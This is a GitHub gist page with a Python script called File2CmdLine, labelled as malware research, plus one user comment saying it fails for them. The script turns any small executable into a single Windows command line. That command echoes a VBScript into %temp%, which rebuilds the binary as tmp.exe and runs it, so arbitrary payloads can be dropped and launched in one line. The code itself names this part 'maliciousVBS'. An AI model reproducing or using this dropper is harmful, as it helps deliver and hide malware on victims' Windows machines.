Created
May 14, 2018 15:21
-
-
Save DarkCoderSc/a57b9dd9c3f9226ba0e38761be3f65ca to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #----------------------------------------------------------------------------------------------------------------------- | |
| # PHROZEN SAS (c) 2018 - www.phrozen.io | |
| # Jean-Pierre LESUEUR ([email protected]) | |
| # | |
| # Name : File2CmdLine | |
| # Description : Conv a small file to a single line command. When executed the file is extracted and executed. | |
| # Category : Malware Research | |
| # Version : 1 (27/04/2017) | |
| # Target OS : Windows XP->Windows 10 (32/64bit) | |
| # License : MIT | |
| # | |
| # Example of command: | |
| # python File2CmdLine.py -f "c:\tmp\smallapp.exe"-o "c:\tmp\test.bat" | |
| #----------------------------------------------------------------------------------------------------------------------- | |
| import argparse | |
| import sys | |
| import os | |
| # Define arguments | |
| parser = argparse.ArgumentParser(description='File2Batch') | |
| parser.add_argument('-f', action="store", dest="srcFile", metavar='in-file', type=argparse.FileType('rb'), required=True, help="File to be encoded in command line.") | |
| parser.add_argument('-o', action="store", dest="outFile", metavar='out-file', type=argparse.FileType('wt'), required=True, help="Output file containing the output command line.") | |
| try: | |
| argv = parser.parse_args() | |
| except IOError: | |
| parser.error() | |
| # | |
| # TRANSFORM INPUT FILE IN BINARY ARRAY | |
| # | |
| payload = "payload=array("; | |
| with open(argv.srcFile.name, 'rb') as FFile: | |
| while True: | |
| s = FFile.read(1) | |
| if len(s) == 0: break | |
| b = ord(s) | |
| payload += str(b) + "," | |
| payload = payload[:-1] | |
| payload += ")" | |
| FFile.close | |
| # | |
| # WRITE VBS EXTRACTION AND EXECUTION CODE TO BE PLACED IN A SHELL | |
| # | |
| tempFile = " >> %temp%\\tmp.vbs" | |
| maliciousVBS = "del %temp%\\tmp.vbs & " | |
| maliciousVBS += "echo " + payload + tempFile + " & " | |
| maliciousVBS += "echo " + "Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\")" + tempFile + " & " | |
| maliciousVBS += "echo " + "Set CTF = FSO.CreateTextFile(\"%temp%\\tmp.exe\")" + tempFile + " & " | |
| maliciousVBS += "echo " + "for i = 0 to UBound(payload)" + tempFile + " & " | |
| maliciousVBS += "echo " + "buff = buff^&chr(payload(i))" + tempFile + " & " | |
| maliciousVBS += "echo " + "next" + tempFile + " & " | |
| maliciousVBS += "echo " + "CTF.Write buff" + tempFile + " & " | |
| maliciousVBS += "echo " + "Dim objShell" + tempFile + " & " | |
| maliciousVBS += "echo " + "Set objShell = WScript.CreateObject(\"WScript.Shell\")" + tempFile + " & " | |
| maliciousVBS += "echo " + "CTF.Close" + tempFile + " & " | |
| maliciousVBS += "echo " + "objShell.Run(\"%temp%\\tmp.exe\")" + tempFile + " & " | |
| maliciousVBS += "%temp%\\tmp.vbs" | |
| with open(argv.outFile.name, 'w') as FDest: | |
| FDest.write(maliciousVBS) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Not sure why as your other script (File2Lnk) works fine but, this won't work for myself. I watched temp directory and files are never dropped/decoded leading to nothing running. using python file2cmdline.py -f testfile.exe -o TestBat.bat tried with both python 2.7 and python 3.7 still won't work..